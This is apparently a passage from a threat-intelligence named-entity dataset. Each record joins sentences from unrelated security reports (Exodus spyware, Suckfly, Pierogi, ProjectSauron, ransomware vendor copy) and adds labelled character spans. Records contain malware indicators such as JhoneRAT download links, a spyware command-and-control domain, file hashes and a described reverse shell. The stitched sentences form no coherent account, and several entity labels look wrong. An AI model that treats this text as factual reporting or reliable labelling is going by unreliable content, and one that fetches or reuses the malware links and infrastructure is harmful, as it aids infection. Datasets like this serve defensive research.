"Organization"}, {"start": 567, "end": 584, "label": "System"}, {"start": 644, "end": 656, "label": "Malware"}, {"start": 660, "end": 679, "label": "Malware"}, {"start": 682, "end": 690, "label": "Malware"}, {"start": 693, "end": 777, "label": "Indicator"}]} {"text": "these lines instead : Data Collection and Exfiltration As mentioned , mike.jar equips the spyware with extensive collection capabilities , including : Retrieve a list of installed applications . 
In this case , the attackers maintained a presence on the target 's network for nearly six months between September 2016 and March 2017 . JhoneRAT : https://drive.google.com/uc?export=download&id=1d-toE89QnN5ZhuNZIc2iF4-cbKWtk0FD . This newest edition of the malware includes novel documents containing macros that extract the embedded package once opened and execute it once the document closes instead of having the victim click on a video link as before .", "spans": [{"start": 70, "end": 78, "label": "Indicator"}, {"start": 333, "end": 341, "label": "Malware"}, {"start": 344, "end": 424, "label": "Indicator"}, {"start": 454, "end": 461, "label": "Malware"}]} {"text": "Record surroundings using the built-in microphone in 3gp format . In other attacks , there was evidence that Felismus was installed using a tool known as Starloader ( detected by Symantec as Trojan.Starloader ) . JhoneRAT : https://drive.google.com/uc?export=download&id=1kbHVkvPIjX49qJ62TBz6drW2YPiiaX2a . The attackers ' aim is to put the organisation in an unbearable position by stopping it from functioning , and then demanding a ransom that can stretch to millions of dollars .", "spans": [{"start": 109, "end": 117, "label": "System"}, {"start": 154, "end": 164, "label": "System"}, {"start": 179, "end": 187, "label": "Organization"}, {"start": 191, "end": 208, "label": "System"}, {"start": 213, "end": 221, "label": "Malware"}, {"start": 224, "end": 304, "label": "Indicator"}]} {"text": "Retrieve the browsing history and bookmarks from Chrome and SBrowser ( the browser shipped with Samsung phones ) . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others . JhoneRAT : https://twitter.com/jhone87438316 . 
They are usually motivated by a cause of some sort , such as highlighting human rights or alerting a large corporation to their system vulnerabilities .", "spans": [{"start": 49, "end": 55, "label": "System"}, {"start": 60, "end": 68, "label": "System"}, {"start": 96, "end": 103, "label": "Organization"}, {"start": 115, "end": 123, "label": "Organization"}, {"start": 146, "end": 162, "label": "Malware"}, {"start": 175, "end": 190, "label": "Malware"}, {"start": 193, "end": 210, "label": "Malware"}, {"start": 217, "end": 232, "label": "Malware"}, {"start": 248, "end": 256, "label": "Malware"}, {"start": 259, "end": 292, "label": "Indicator"}]} {"text": "Extract events from the Calendar app . Additionally , Starloader was also observed deploying additional tools used by the attackers , such as credential dumpers and keyloggers . New Cyber Espionage Campaigns Targeting Palestinians - Part 2 : The Discovery of the New , Mysterious Pierogi backdoor . When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users , the company \u2019s then - CEO Noel Biderman was quick to point the finger at an unnamed former contractor .", "spans": [{"start": 24, "end": 36, "label": "System"}, {"start": 54, "end": 64, "label": "System"}, {"start": 142, "end": 160, "label": "System"}, {"start": 165, "end": 175, "label": "System"}, {"start": 280, "end": 296, "label": "Malware"}, {"start": 335, "end": 352, "label": "Organization"}, {"start": 477, "end": 490, "label": "Organization"}, {"start": 527, "end": 552, "label": "Organization"}]} {"text": "Extract the calls log . ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 . 
Since December 2019 , the Cybereason Nocturnus team has been investigating a campaign targeting Palestinian individuals and entities in the Middle East , mostly within the Palestinian territories . If more groups start adopting CL0P 's zero - day exploitation techniques , the ransomware landscape could tilt from service - oriented attacks to a more aggressive , vulnerability - focused model \u2014 a move that could skyrocket the number of victims .", "spans": [{"start": 24, "end": 29, "label": "Organization"}, {"start": 143, "end": 164, "label": "Organization"}, {"start": 217, "end": 237, "label": "Organization"}, {"start": 419, "end": 461, "label": "Organization"}]} {"text": "Record phone calls audio in 3gp format . Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access . This campaign uses social engineering and decoy documents related to geopolitical affairs and relations between the Palestinian government , and references Egypt , Hezbollah , and Iran . As with other groups , it is possible that espionage and intelligence gathering are the first steps toward deploying ransomware or wiper malware .", "spans": [{"start": 130, "end": 139, "label": "Organization"}, {"start": 143, "end": 166, "label": "System"}, {"start": 169, "end": 172, "label": "System"}, {"start": 327, "end": 349, "label": "Organization"}]} {"text": "Take pictures with the embedded camera . The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks . Part one of this research investigates the Spark campaign , where attackers use social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor . 
With ThreatConnect , teams get a single Platform to simplify the processing , categorization , and response to suspicious emails , reducing the time to remediate active threats from days to minutes .", "spans": [{"start": 94, "end": 100, "label": "System"}, {"start": 103, "end": 118, "label": "System"}, {"start": 316, "end": 330, "label": "Malware"}, {"start": 338, "end": 351, "label": "System"}, {"start": 373, "end": 381, "label": "System"}]} {"text": "Collect information on surrounding cellular towers ( BTS ) . Strider has been active since at least October 2011 . For more information about part one , click here . Because indicators of attack are all about interactions with your network , it may be possible that the actions performed during the early stages of the cyberattack kill chain are not considered harmful .", "spans": [{"start": 61, "end": 68, "label": "Organization"}, {"start": 174, "end": 194, "label": "Indicator"}]} {"text": "Extract the address book . Lua modules is a technique that has previously been used by Flamer . During the attacks , victims are infected with a previously undocumented backdoor , dubbed Pierogi by Cybereason . The frameworks evolving realworld tactics , techniques and procedures can help organizations better understand how to allocate resources properly to detect ransomware early enough to prevent a successful attack .", "spans": [{"start": 12, "end": 24, "label": "System"}, {"start": 27, "end": 38, "label": "System"}, {"start": 169, "end": 177, "label": "Malware"}, {"start": 187, "end": 194, "label": "Malware"}, {"start": 198, "end": 208, "label": "Organization"}]} {"text": "Extract the contacts list from the Facebook app . The Remsec malware used by Strider has a modular design . This backdoor allows attackers to spy on targeted victims . 
This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": [{"start": 35, "end": 47, "label": "System"}, {"start": 54, "end": 68, "label": "System"}, {"start": 77, "end": 84, "label": "Organization"}, {"start": 113, "end": 121, "label": "Malware"}, {"start": 182, "end": 273, "label": "Indicator"}]} {"text": "Extract logs from Facebook Messenger conversations . The group has maintained a low profile until now and its targets have been mainly organizations and individuals that would be of interest to a nation state 's intelligence services . Cybereason suspects that the backdoor may have been obtained in underground communities rather than home-grown , as the evidence found in the code of the backdoor suggests it may have been developed by Ukranian-speaking hackers . Malware detections do n\u2019t matter nearly as much as malware damage \u2014 just one ransomware attack can close your business .", "spans": [{"start": 18, "end": 36, "label": "System"}, {"start": 212, "end": 233, "label": "Organization"}, {"start": 236, "end": 246, "label": "Organization"}, {"start": 265, "end": 273, "label": "Malware"}]} {"text": "Take a screenshot of any app in foreground . The group 's targets include a number of organizations and individuals located in Russia . The tactics , techniques , and procedures ( TTPs ) , content , and theme of the decoy documents , as well as the victimology observed in the campaign , resemble previous attacks that have targeted Palestinians . 
Researchers at Akamai reported on a Magecart skimmer campaign disguised as Google Tag Manager that also made the news with the compromise of one of Canada 's largest liquor store ( LCBO ) .", "spans": [{"start": 363, "end": 369, "label": "Organization"}, {"start": 384, "end": 409, "label": "Organization"}, {"start": 423, "end": 441, "label": "System"}, {"start": 496, "end": 535, "label": "Organization"}]} {"text": "Extract information on pictures from the Gallery . Remsec uses a Lua interpreter to run Lua modules which perform various functions . In particular , these campaigns appear to be related to attacks carried out by a group called MoleRATs ( aka , Gaza Cyber Gang , Moonlight ) , an Arabic-speaking , politically motivated group that has been operating in the Middle East since 2012 . One can only guess how they will be used .", "spans": [{"start": 51, "end": 57, "label": "System"}, {"start": 65, "end": 80, "label": "System"}, {"start": 88, "end": 99, "label": "System"}, {"start": 228, "end": 236, "label": "Organization"}, {"start": 245, "end": 260, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 382, "end": 422, "label": "Indicator"}]} {"text": "Extract information from th GMail app . Russia . Cyber Espionage with a New Malware : The Cybereason Nocturnus team has discovered recent , targeted attacks in the Middle East to deliver the Pierogi backdoor for politically-driven cyber espionage . 
Ukrainian and Polish government and military organizations among those targeted Talos first discovered a campaign in late April using several malicious files very likely intended for users in Ukraine , based on the content of the lure displayed when the target opens a malicious Microsoft Excel file .", "spans": [{"start": 28, "end": 33, "label": "System"}, {"start": 90, "end": 110, "label": "Organization"}, {"start": 191, "end": 207, "label": "Malware"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 263, "end": 280, "label": "Organization"}, {"start": 285, "end": 307, "label": "Organization"}, {"start": 329, "end": 334, "label": "Organization"}, {"start": 432, "end": 448, "label": "Organization"}]} {"text": "Dump data from the IMO messenger app . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Targeting Palestinians : The campaigns seems to target Palestinian individuals and entities , likely related to the Palestinian government . Harrison signed his threatening missive with the salutation , \u201c We are legion , \u201d suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": [{"start": 23, "end": 32, "label": "System"}, {"start": 119, "end": 126, "label": "Malware"}, {"start": 129, "end": 166, "label": "Malware"}, {"start": 361, "end": 383, "label": "Organization"}, {"start": 386, "end": 394, "label": "Organization"}, {"start": 525, "end": 539, "label": "Organization"}]} {"text": "Extract call logs , contacts and messages from the Skype app . the group 's targets include an organization in Sweden . 
Using Geopolitically-charged Lure Content : The attackers use specially crafted lure content to trick their targets into opening malicious files that infect the victim \u2019s machine with the Pierogi backdoor . The name \u201c Anonymous Sudan \u201d is likely an attempted appropriation of the brand of the well - known hacktivist collective \u201c Anonymous , \u201d similar to another KillNet affiliate , \u201c Anonymous Russia . \u201d", "spans": [{"start": 51, "end": 56, "label": "System"}, {"start": 308, "end": 324, "label": "Malware"}, {"start": 338, "end": 353, "label": "Organization"}, {"start": 505, "end": 521, "label": "Organization"}]} {"text": "Retrieve all SMS messages . the group 's targets include an embassy in Belgium . The decoy content of the malicious files revolves around various political affairs in the Middle East , specifically targeting the tension between Hamas and other entities in the region . All of these things point to threat actors and groups like Winnti will continue to try different methods of attack .", "spans": [{"start": 60, "end": 67, "label": "Organization"}, {"start": 298, "end": 311, "label": "Organization"}, {"start": 328, "end": 334, "label": "Organization"}]} {"text": "Extract messages and the encryption key from the Telegram app . Symantec will continue to search for more Remsec modules and targets in order to build upon our understanding of Strider and better protect our customers . Perpetrated by an Arabic-speaking APT , MoleRATs : The modus-operandi of the attackers as well as the social engineering decoy content seem aligned with previous attacks carried out by an Arabic-speaking APT group called MoleRATs ( aka Gaza Cybergang ) . 
.bat \"", "spans": [{"start": 49, "end": 57, "label": "System"}, {"start": 64, "end": 72, "label": "Organization"}, {"start": 106, "end": 120, "label": "System"}, {"start": 177, "end": 184, "label": "Organization"}, {"start": 260, "end": 268, "label": "Organization"}, {"start": 441, "end": 449, "label": "Organization"}, {"start": 456, "end": 470, "label": "Organization"}, {"start": 475, "end": 481, "label": "Indicator"}]} {"text": "Dump data from the Viber messenger app . Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" . This group has been operating in the Middle East since 2012 . Indicators of compromise help answer the question What happened while indicators of attack can help answer questions like What is happening and why A proactive approach to detection uses both IOAs and IOCs to discover security incidents or threats in as close to real time as possible .", "spans": [{"start": 19, "end": 34, "label": "System"}, {"start": 93, "end": 106, "label": "System"}, {"start": 125, "end": 132, "label": "Organization"}]} {"text": "Extract logs from WhatsApp . In September 2015 , our anti-targeted attack technologies caught a previously unknown attack . Similar to previous attacks , this campaign starts with social engineering . As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": [{"start": 18, "end": 26, "label": "System"}, {"start": 241, "end": 245, "label": "Organization"}, {"start": 257, "end": 264, "label": "Organization"}]} {"text": "Retrieve media exchanged through WhatsApp . Forensic analysis indicates that the APT has been operational since at least June 2011 and was still active in 2016 . In one instance , it lures victims to open an email attachment . 
Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": [{"start": 33, "end": 41, "label": "System"}, {"start": 208, "end": 213, "label": "System"}, {"start": 227, "end": 234, "label": "Organization"}, {"start": 406, "end": 418, "label": "Organization"}]} {"text": "Extract the Wi-Fi network 's password . After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server . In others , it persuades victims to download a report about a recent political affair pertaining to the Middle East and specifically to Palestinian matters . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": [{"start": 67, "end": 80, "label": "System"}, {"start": 151, "end": 164, "label": "System"}, {"start": 372, "end": 392, "label": "Organization"}, {"start": 504, "end": 522, "label": "System"}, {"start": 523, "end": 552, "label": "Vulnerability"}, {"start": 553, "end": 569, "label": "Vulnerability"}, {"start": 574, "end": 590, "label": "Vulnerability"}]} {"text": "Extract data from WeChat app . In a number of the cases we analyzed , ProjectSauron deployed malicious modules inside the custom network encryption 's software directory , disguised under similar filenames and accessing the data placed beside its own executable . In most cases , the downloaded file is either an executable that masquerades as a Microsoft Word document or a weaponized Microsoft Word document . 
According to a recent study by Trellix and the Center for Strategic and International Studies CSIS , 86 of organizations believe they have been targeted by a nationstate threat actor .", "spans": [{"start": 18, "end": 24, "label": "System"}, {"start": 70, "end": 83, "label": "System"}, {"start": 93, "end": 110, "label": "System"}, {"start": 346, "end": 369, "label": "System"}, {"start": 375, "end": 400, "label": "System"}, {"start": 443, "end": 450, "label": "Organization"}, {"start": 459, "end": 510, "label": "Organization"}, {"start": 519, "end": 532, "label": "Organization"}, {"start": 570, "end": 594, "label": "Organization"}]} {"text": "Extract current GPS coordinates of the phone . The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods . As soon as the victim double-clicks on the dropper , they are presented with the decoy document . We highly suspect the \u201c Pig network \u201d to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": [{"start": 71, "end": 84, "label": "System"}, {"start": 426, "end": 437, "label": "System"}, {"start": 468, "end": 495, "label": "System"}, {"start": 540, "end": 552, "label": "Organization"}]} {"text": "While some of these acquisition are performed purely through code in mike.jar , some others that require access to , for example , SQLite databases or other files in the application 's storage are performed through rootdaemon instead , which should be running with root privileges . In September 2015 , Kaspersky Lab 's Anti-Targeted Attack Platform discovered anomalous network traffic in a government organization network . The document lowers the victim \u2019s suspicions by distracting them with a real document while the dropper installs the backdoor . 
This file contains the ransom note .", "spans": [{"start": 69, "end": 77, "label": "Indicator"}, {"start": 303, "end": 316, "label": "Organization"}, {"start": 361, "end": 386, "label": "Malware"}, {"start": 392, "end": 415, "label": "Organization"}, {"start": 543, "end": 551, "label": "Malware"}, {"start": 554, "end": 588, "label": "Indicator"}]} {"text": "In order to achieve this , mike.jar connects to rootdaemon through various TCP ports that the daemon binds on some extraction routines for supported applications : Port 6202 : WhatsApp extraction service . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers . However , some of the documents also play an additional role in the attack . On Oct. 10 , 2023 , Citrix released a security bulletin for a sensitive information disclosure vulnerability ( CVE-2023 - 4966 ) impacting NetScaler ADC and NetScaler Gateway appliances .", "spans": [{"start": 27, "end": 35, "label": "Indicator"}, {"start": 164, "end": 173, "label": "Indicator"}, {"start": 176, "end": 184, "label": "System"}, {"start": 221, "end": 229, "label": "Organization"}, {"start": 332, "end": 341, "label": "Organization"}, {"start": 532, "end": 547, "label": "Vulnerability"}]} {"text": "Ports 6203 and 6204 : Facebook extraction service . Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks . While some are more neutral , quoting from newspapers and the media , others seem to report fake news to spread misinformation that serves a political agenda . Ways our customers can detect and block this threat are listed below .", "spans": [{"start": 0, "end": 19, "label": "Indicator"}, {"start": 22, "end": 30, "label": "Organization"}, {"start": 62, "end": 83, "label": "System"}]} {"text": "Port 6205 : Gmail extraction service . 
activity originated from three separate IP addresses , all located in Chengdu , China . With regards to decoy content themes , this campaign resembles previous campaigns reported in blogs by Vectra , Unit 42 , and Talos . Education accounts for a huge proportion of known Vice Society attacks .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 17, "label": "System"}, {"start": 239, "end": 246, "label": "Organization"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 311, "end": 331, "label": "Organization"}]} {"text": "Port 6206 : Skype extraction service . We don't know the exact date Suckfly stole the certificates from the South Korean organizations . The contents of the decoy documents seems to include : This was followed by an executable downloader and payload concealed in an image file , likely to make its detection more difficult .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 17, "label": "System"}]} {"text": "Port 6207 : Viber extraction service . stolen certificates being used maliciously occurred in early 2014 . Potentially fake documents that appear to be issued by the Palestinian government . The alert described emails that delivered an Evernotethemed lure to entice targeted recipients into downloading a trojan .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 17, "label": "System"}, {"start": 166, "end": 188, "label": "Organization"}]} {"text": "Port 6208 : IMO extraction service . Symantec detects this threat as Backdoor.Nidiran . Meetings minutes of different Palestinian organizations . 
Request a demo meeting with us or reach out to us at salesthreatconnect.com to see how we can help automate phishing analysis and response for your organization .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 15, "label": "System"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 69, "end": 85, "label": "Malware"}, {"start": 199, "end": 221, "label": "Organization"}]} {"text": "Port 6209 : Telegram extraction service . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . News about Hamas and the Palestinian National Authority . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 \u2019s domain for hosting his own private blog .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 20, "label": "System"}, {"start": 129, "end": 186, "label": "Vulnerability"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 287, "end": 317, "label": "Organization"}, {"start": 342, "end": 358, "label": "Indicator"}, {"start": 373, "end": 381, "label": "Indicator"}, {"start": 393, "end": 400, "label": "Organization"}]} {"text": "Port 6210 : SBrowser extraction service . The threat then executes \" svchost.exe \" . Potentially fake , leaked Hamas documents . \" These [ Rising Sun ] implants were all based on the original Backdoor Duuzer source code , \" the researchers say in their report .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 20, "label": "System"}, {"start": 69, "end": 80, "label": "System"}, {"start": 139, "end": 149, "label": "System"}, {"start": 192, "end": 219, "label": "Malware"}]} {"text": "Port 6211 : Calendar extraction service . 
Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer . Criticism of and embarrassing content about Hamas . This includes tens of thousands of terminals outside of Ukraine that , among other things , support wind turbines and provide Internet services to private citizens .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 20, "label": "System"}, {"start": 82, "end": 97, "label": "Malware"}, {"start": 129, "end": 146, "label": "System"}, {"start": 160, "end": 178, "label": "System"}]} {"text": "Port 6212 : Chrome extraction service . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed . APA S-IDTY adopted resolution Unlimited support for Palestinian people.docx : We can not independently confirm KillMilk 's claims of having previous affiliation with the hacktivist group Universal Dark Service .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 12, "end": 18, "label": "System"}, {"start": 73, "end": 80, "label": "System"}, {"start": 104, "end": 130, "label": "System"}, {"start": 165, "end": 169, "label": "Malware"}, {"start": 206, "end": 281, "label": "Indicator"}, {"start": 393, "end": 415, "label": "Organization"}]} {"text": "These services appear to be running on all network interfaces and are therefore accessible to anyone sharing a local network with an infected device . The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Describes a resolution by the Asian Parliamentary Assembly ( APA ) held in Anatalya , announcing unlimited support for the Palestinian people 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c . 
jalsa.rar : The attackers behind Earth Vetala use features of remote access software to steal sensitive information or download malware for additional cyber operations , leveraging spearphishing emails and lure documents containing embedded links to a legitimate filesharing service Onehub to distribute archives containing the ScreenConnect remote administrator tool and RemoteUtilities software .", "spans": [{"start": 211, "end": 220, "label": "Organization"}, {"start": 240, "end": 284, "label": "Organization"}, {"start": 317, "end": 345, "label": "Organization"}, {"start": 348, "end": 351, "label": "Organization"}, {"start": 429, "end": 493, "label": "Indicator"}, {"start": 496, "end": 505, "label": "Indicator"}, {"start": 529, "end": 541, "label": "Organization"}, {"start": 779, "end": 785, "label": "System"}, {"start": 824, "end": 863, "label": "System"}, {"start": 868, "end": 892, "label": "System"}]} {"text": "Following we can see an example of a connection to port 6209 which is used to extract data from the Telegram app . Blackfly began with a campaign to steal certificates , which were later used to sign malware used in targeted attacks . Contains the above mentioned document , as well as photos of the assemblies and political cartoons criticizing Hamas 50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b . Cisco Duo provides multi - factor authentication for users to ensure only those authorized are accessing your network .", "spans": [{"start": 51, "end": 60, "label": "Indicator"}, {"start": 100, "end": 108, "label": "System"}, {"start": 115, "end": 123, "label": "Organization"}, {"start": 352, "end": 416, "label": "Indicator"}, {"start": 419, "end": 428, "label": "System"}]} {"text": "We are able to send commands to the service such as dumpmsgdb or getkey ( which dumps the tgnet.dat file ) . 
In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates . Internet in government.pdf / Define the Internet in government institutions.pdf : These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": [{"start": 90, "end": 104, "label": "Indicator"}, {"start": 125, "end": 133, "label": "Organization"}, {"start": 299, "end": 325, "label": "Indicator"}, {"start": 328, "end": 378, "label": "Indicator"}, {"start": 432, "end": 444, "label": "Malware"}]} {"text": "Data acquired from mike.jar 's extraction modules is normally XORed and stored in a folder named .lost+found on the SD card . Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly . Announcement about a new regulation regarding internet usage in Palestinian government institutions . A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend .", "spans": [{"start": 19, "end": 27, "label": "Indicator"}, {"start": 323, "end": 345, "label": "Organization"}, {"start": 363, "end": 367, "label": "Organization"}]} {"text": "Data is eventually exfiltrated over a TLS connection to the Command & Control server ws.my-local-weather [ . The attacks targeted high-profile targets , including government and commercial organizations . The announcement states that porn , gambling and entertainment sites will be blocked 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 . 
Previous versions of TIEDYE were configured to persist via a LaunchAgent .", "spans": [{"start": 78, "end": 108, "label": "Indicator"}, {"start": 163, "end": 173, "label": "Organization"}, {"start": 178, "end": 202, "label": "Organization"}, {"start": 290, "end": 354, "label": "Indicator"}, {"start": 357, "end": 384, "label": "Malware"}]} {"text": "] com through an upload queue . these attacks were part of a planned operation against specific targets in India . Congratulations_Jan-7.pdf : Inside , we break down the 5 most dangerous threats facing businesses this year \u2014 including LockBit and SocGholish \u2014 dissecting how they \u2019re delivered , where they spread , what they destroy , and the best practices to protect against them .", "spans": [{"start": 115, "end": 140, "label": "Indicator"}, {"start": 235, "end": 242, "label": "Malware"}, {"start": 247, "end": 257, "label": "Malware"}]} {"text": "As mentioned before , our test device was automatically from stage one to stage two , which started collecting data . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . 
Letter allegedly from the Barcelona B-IDTY branch E-LOC of the SysUpdate has been in use by Budworm since at least 2020 , and the attackers appear to continually develop the tool to improve its capabilities and avoid detection .", "spans": [{"start": 227, "end": 243, "label": "Malware"}, {"start": 409, "end": 418, "label": "Malware"}, {"start": 438, "end": 445, "label": "Organization"}, {"start": 476, "end": 485, "label": "Organization"}]} {"text": "For example , the password of the WiFi network used by the phone was stored in the folder /storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/ using the following file name format DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt ( the datetime followed by the IMEI ) . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . Federation of Independent Palestinian Communities and Organizations and Events in the Diaspora . This is clear and shocking evidence of a deliberate and malicious attack by Russia against Ukraine which had significant consequences on ordinary people and businesses in Ukraine and across Europe .", "spans": [{"start": 90, "end": 159, "label": "Indicator"}, {"start": 197, "end": 240, "label": "Indicator"}, {"start": 390, "end": 406, "label": "Malware"}, {"start": 509, "end": 587, "label": "Organization"}, {"start": 662, "end": 678, "label": "Malware"}, {"start": 682, "end": 688, "label": "Organization"}, {"start": 697, "end": 704, "label": "Organization"}]} {"text": "Eventually we observed the agent exfiltrate the WiFi password from our test phone to the Command & Control server : Similarly , the agent also sent to the Command & Control the list of installed apps : This Command & Control seems to have been active since at least April 2017 and was registered impersonating the legitimate service AccuWeather . 
The first known Suckfly campaign began in April of 2014 . The letter commemorates the 73rd anniversary of the Syrian Army , and expresses the Palestinian support of Bashar Al-Asad . Attackers may perform seemingly authorized actions but left unchecked , victims may be met with an unwelcome surprise .", "spans": [{"start": 333, "end": 344, "label": "System"}, {"start": 457, "end": 468, "label": "Organization"}, {"start": 529, "end": 538, "label": "Organization"}, {"start": 601, "end": 608, "label": "Organization"}]} {"text": "Local and Remote Shells In order to execute commands on the infected devices , as well as to provide a reverse shell to the Command & Control operators , Exodus Two immediately attempts to execute a payload it downloads with the name null . Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India . The letter ends with \u201c Death to Israel \u201d and \u201c Humiliation and shame to the tyrant America \u201d 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": [{"start": 154, "end": 164, "label": "Malware"}, {"start": 263, "end": 287, "label": "Organization"}, {"start": 301, "end": 332, "label": "Organization"}, {"start": 342, "end": 352, "label": "Organization"}, {"start": 481, "end": 545, "label": "Indicator"}, {"start": 713, "end": 743, "label": "Vulnerability"}]} {"text": "Once launched , null will first verify whether it is able to fork on the system and that there is no other instance of itself currently running by checking whether the local port number 6842 is available . It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have . 
Daily_Report.docx : The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": [{"start": 174, "end": 190, "label": "Indicator"}, {"start": 335, "end": 352, "label": "Indicator"}, {"start": 359, "end": 371, "label": "Organization"}, {"start": 407, "end": 418, "label": "Organization"}, {"start": 436, "end": 449, "label": "Organization"}, {"start": 454, "end": 472, "label": "Organization"}]} {"text": "This payload will then attempt to instantiate a remote reverse /system/bin/sh shell to the Command & Control ws.my-local-weather [ . Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts . Daily summary of news concerning different Palestinian govenment related issues d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": [{"start": 63, "end": 77, "label": "Indicator"}, {"start": 109, "end": 132, "label": "Indicator"}, {"start": 181, "end": 198, "label": "System"}, {"start": 222, "end": 231, "label": "System"}, {"start": 316, "end": 337, "label": "Organization"}, {"start": 353, "end": 417, "label": "Indicator"}, {"start": 420, "end": 429, "label": "Organization"}]} {"text": "] com on port 22011 . In 2015 , Suckfly conducted a multistage attack . Directory of Government Services.pdf : Tracked by Mandiant as FREEFIRE , it is a lightweight backdoor written for .NET .", "spans": [{"start": 9, "end": 19, "label": "Indicator"}, {"start": 72, "end": 108, "label": "Indicator"}, {"start": 134, "end": 142, "label": "Malware"}, {"start": 145, "end": 192, "label": "Malware"}]} {"text": "It is worth noticing that this remote reverse shell does not employ any transport cryptography . 
Suckfly conducted a multistage attack between April 22 and May 4 . A screenshot from a website of the Palestinian government , showing a directory of the different ministries 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 . These requests are aimed at spreading the attack laterally within the network and can be investigated using Endpoint Detection and Response EDR solutions .", "spans": [{"start": 199, "end": 221, "label": "Organization"}, {"start": 272, "end": 336, "label": "Indicator"}]} {"text": "The traffic transits in clear and is therefore potentially exposed to man-in-the-middle attacks : At the same time , null will also bind a local shell on 0.0.0.0:6842 . On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack . Meeting Agenda.pdf : That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": [{"start": 154, "end": 166, "label": "Indicator"}, {"start": 359, "end": 376, "label": "System"}, {"start": 414, "end": 432, "label": "Indicator"}, {"start": 475, "end": 484, "label": "Malware"}, {"start": 552, "end": 568, "label": "Malware"}]} {"text": "This local port is used by Exodus Two to execute various commands on the Android device , such as enabling or disabling certain services , or parsing app databases . Suckfly conducted a multistage attack against an e-commerce organization . Corrupted file 